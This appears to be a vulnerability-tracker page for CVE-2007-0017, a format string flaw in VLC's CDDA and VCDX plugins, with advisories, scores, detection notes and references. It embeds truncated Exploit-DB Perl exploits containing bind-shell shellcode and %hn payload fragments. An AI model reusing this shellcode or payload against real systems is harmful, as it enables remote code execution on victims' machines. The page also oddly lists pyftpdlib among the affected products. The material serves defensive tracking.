CVE-2007-0017
Published: 2007-01-03
Priority P341 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit indexed
EPSS: 11.97% (95.6th percentile)
Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2) cdio_log_handler and (3) vcd_log_handler functions in modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in an invalid URI, as demonstrated by a udp://-- URI in an M3U file.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 0.8.6-svn20061012.debian-1.2 (bookworm) | vlc 0.8.6-svn20061012.debian-1.2 (bookworm) |
| g.rodola | pyftpdlib | >= 0 < 0.2.0 | 0.2.0 |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | >= 0 < 0.8.6-svn20061012.debian-1.2 | 0.8.6-svn20061012.debian-1.2 |
| videolan | vlc_media_player | >= 0 < 0.8.6-svn20061012.debian-1.2 | 0.8.6-svn20061012.debian-1.2 |
| videolan | vlc_media_player | >= 0 < 0.8.6-svn20061012.debian-1.2 | 0.8.6-svn20061012.debian-1.2 |
| videolan | vlc_media_player | >= 0 < 0.8.6-svn20061012.debian-1.2 | 0.8.6-svn20061012.debian-1.2 |
| xine | xine | — | — |
Detection & IOCs (extracted from sources)
- Malicious M3U file contains a long #EXTINF line followed by a udp://-- URI with format string specifiers (e.g., %hn) as the stream URL — detect M3U files where the URI scheme is udp:// and the URI body contains printf-style format specifiers.
- Exploit payload embeds shellcode in the #EXTINF comment field of an M3U file (NOP sled + shellcode bytes before the newline), followed by the malicious udp:// URI — inspect #EXTINF lines for binary/non-printable content.
- The format string payload uses %hn write primitives (e.g., %<N>d%<pos>$hn patterns) embedded in the udp:// URI string — detect VLC processing of M3U URIs containing %hn or %<digit>$hn substrings.
- Vulnerable code paths are in the CDDA plugin (libcdda_plugin) and VCDX plugin (libvcdx_plugin) log handlers — monitor for crashes or unexpected code execution originating from these VLC plugin modules.
- CVE-2007-0255 (XINE 0.99.4) is noted as a possible variant of CVE-2007-0017 — the same M3U/udp:// format string attack pattern may apply to XINE but with different affected code paths and addresses.
- The x86 exploit uses a placeholder jump address (0x41424344) that must be replaced with a valid target address for a working exploit — the provided exploit is a template requiring adaptation.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| ghsa | — | 7.5 | HIGH | — |
| osv | — | 6.8 | MEDIUM | — |
| vendor_debian | — | 6.8 | MEDIUM | — |
GHSA
GHSA-3m83-fp4v-w9rv · ghsa_unreviewed · 2022-05-01 · CVSS 6.8 · CVE-2007-0255 [MEDIUM]
XINE 0.99.4 allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a certain M3U file that contains a long #EXTINF line and contains format string specifiers in an invalid udp:// URI, possibly a variant of CVE-2007-0017.
GHSA
GHSA-xh7p-83h3-2grw · ghsa_unreviewed · 2022-05-01 · CVE-2007-0017 [MEDIUM] · CWE-134
Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2) cdio_log_handler and (3) vcd_log_handler functions in modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in an invalid URI, as demonstrated by a udp://-- URI in an M3U file.
GHSA
Improper privilege management in pyftpdlib · ghsa · 2022-05-01 · CVSS 7.5 · CVE-2007-6741 [HIGH] · CWE-269
The ftp_PORT function in FTPServer.py in pyftpdlib before 0.2.0 does not prevent TCP connections to privileged ports if the destination IP address matches the source IP address of the connection from the FTP client, which might allow remote authenticated users to conduct FTP bounce attacks via crafted FTP data, as demonstrated by an FTP bounce attack against a NAT server, a related issue to CVE-1999-0017.
OSV
CVE-2007-0255 [MEDIUM] · osv · 2007-01-16 · CVSS 6.8
XINE 0.99.4 allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a certain M3U file that contains a long #EXTINF line and contains format string specifiers in an invalid udp:// URI, possibly a variant of CVE-2007-0017.
OSV
CVE-2007-0017 [MEDIUM] · osv · 2007-01-03 · CVSS 6.8
Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2) cdio_log_handler and (3) vcd_log_handler functions in modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in an invalid URI, as demonstrated by a udp://-- URI in an M3U file.
Debian
CVE-2007-0017 [MEDIUM] · vlc · vendor_debian · 2007 · CVSS 6.8
Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2) cdio_log_handler and (3) vcd_log_handler functions in modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in an invalid URI, as demonstrated by a udp://-- URI in an M3U file.
Scope: local
- bookworm: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
- bullseye: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
- forky: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
- sid: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
- trixie: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.8.6 (x86) - 'udp://' Format String · exploitdb · 2007-01-02 · CVE-2007-0017

```perl
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#
$outfile = "pwnage.m3u";
$bindshell =
"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c\x89" .
"\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a" .
"\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97" .
"\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49\x0f\x89\xf1\xff" .
"\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" .
"\x54\x54\x53\x53\xb0\x3b\xcd\x80";
# MALLOC 02800000-03008000 [ 8224K] rw-/rwx SM=COW ...e_0x
```
Exploit-DB
VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC) · exploitdb · 2007-01-02 · CVE-2007-0017

```perl
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a saved return addy with our shellcode address.
# This code currently overwrites the saved return addy with the stack location of our shellcode.
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#
# 0xf02031d2: "--? 0j? 0h%11$hn.%12$hn", 'X' ...
# 0xf020329a: 'X' ...
# 0xf0203362: 'X' ...
# 0xf020342a: 'X' ...
# 0xf02034f2: 'X' , "ZY"
# 0xf02035b7: ""
# 0xf02035b8: 'X' , "? 5?\005\017G?? 60"
# 0xf02035d5: ""
# 0xf02035d6: ""
# 0xf02035d7: "\00
```
No writeups or analysis indexed.
References
- http://applefun.blogspot.com/2007/01/moab-02-01-2007-vlc-media-player-udp.html
- http://landonf.bikemonkey.org/code/macosx/MOAB_Day_2.20070103045559.6753.timor.html
- http://osvdb.org/31163
- http://projects.info-pull.com/moab/MOAB-02-01-2007.html
- http://secunia.com/advisories/23592
- http://secunia.com/advisories/23829
- http://secunia.com/advisories/23910
- http://secunia.com/advisories/23971
- http://security.gentoo.org/glsa/glsa-200701-24.xml
- http://securitytracker.com/id?1017464
- http://trac.videolan.org/vlc/changeset/18481
- http://www.debian.org/security/2007/dsa-1252
- http://www.novell.com/linux/security/advisories/2007_13_xine.html
- http://www.securityfocus.com/bid/21852
- http://www.via.ecp.fr/via/ml/vlc-devel/2007-01/msg00005.html
- http://www.videolan.org/patches/vlc-0.8.6-MOAB-02-01-2007.patch
- http://www.videolan.org/sa0701.html
- http://www.vupen.com/english/advisories/2007/0026
- https://exchange.xforce.ibmcloud.com/vulnerabilities/31226
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14313